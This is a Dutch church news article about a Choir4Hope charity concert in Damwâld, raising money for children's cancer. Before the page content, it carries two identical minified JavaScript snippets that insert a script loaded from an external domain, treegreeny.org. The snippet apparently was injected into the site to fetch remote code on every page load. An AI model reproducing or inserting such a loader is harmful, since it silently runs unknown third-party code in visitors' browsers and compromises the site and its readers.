;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Prachtig optreden Choir4Hope - PKN Damwâld

Prachtig optreden Choir4Hope

Gepubliceerd op: zaterdag 22 oktober 2022

Na een oponthoud van 2½ jaar Zingend naar de Zondag  weer van start en kwam zaterdagavond 22 oktober het ruim 100 leden tellende koor Choir4Hope uit Barneveld en omgeving naar de De Ontmoeting in Damwâld.

Het koor is opgericht op 6 oktober 2014 op initiatief van dirigent Peter Overduin, om met de opbrengsten van optredens te strijden tegen met name kanker. De combinatie van zingen voor een goed doel en een breed repertoire blijkt een goede formule en is zeer succesvol!! Het koor kreeg grote bekendheid door deelname aan Hollands Got Talent en hun optredens in Nederland Zingt van de E.O. Choir4Hope treedt uitsluitend op voor goede doelen en heeft daarom ook de ANBI-status waardoor giften aan het koor fiscaal aftrekbaar zijn.

Peter Overduin begon op 8-jarige leeftijd met orgel les en sindsdien is het maken van muziek nooit meer gestopt. Hij volgde dirigentcursussen via de Kurt Thomas Stichting en al vrij snel daarna volgde zijn eerste koor. Mede om persoonlijke redenen wilde hij jaren geleden gaan zingen voor goede doelen en richtte hij Choir4Hope in Barneveld en Inspire2liveChoir in Alblasserdam op. Beide koren zingen hoofdzakelijk Geestelijke liederen maar ook Negro-Spirituals en Klassieke werken.

Naast evangelisatie heeft de organisatie van Zingend naar de Zondag het doel om dienstbaar te zijn aan onze medemens en daarom paste het prima om juist dit koor uit te nodigen. Wat is er mooier om na afloop de opbrengst van de collecte en de sponsoring te schenken aan dit geweldige doel: Het bestrijden van Kanker bij Kinderen. Een ziekte, die we ongetwijfeld allemaal kennen in gezin, familie of kennissenkring en waar nog steeds veel onderzoek voor nodig is om die in de toekomst mogelijk geheel te kunnen uitbannen. Strijdt u mee? Wij willen geen drempels, maar evangelisatie die toegankelijk is voor IEDEREEN.

Alle aanwezigen  genoten van een geweldig optreden. Het koor zong bekende liederen zoals Amazing Grace, Where no one stands alone en Hoog boven alle vragen op de melodie van You raise me up. Solisten Sierk Krol (bariton) en Annelies Schep (sopraan) gaven de avond extra glans. Jacob Schenk uit Urk bespeelde het orgel. Deze gepassioneerde musicus is werkzaam als koordirigent, organist, pianist, panfluitist en zanger. Op dit moment is hij koordirigent van 5 koren en werkt hij vaak mee aan talloze uitvoeringen en cd-opnamen in binnen- en buitenland. Hij begeleidt ook de samenzang die er deze avond weer volop is o.a. van bekende liederen uit Johannes de Heer en de Evangelische Liedbundel. Het belooft weer een prachtige avond te worden waarin de naam van God en het omzien naar onze naaste centraal zullen staan. De presentatie was in handen van dhr. Jan van der Meer uit Drachten, die opnieuw spontaan zijn medewerking verleende aan deze avond.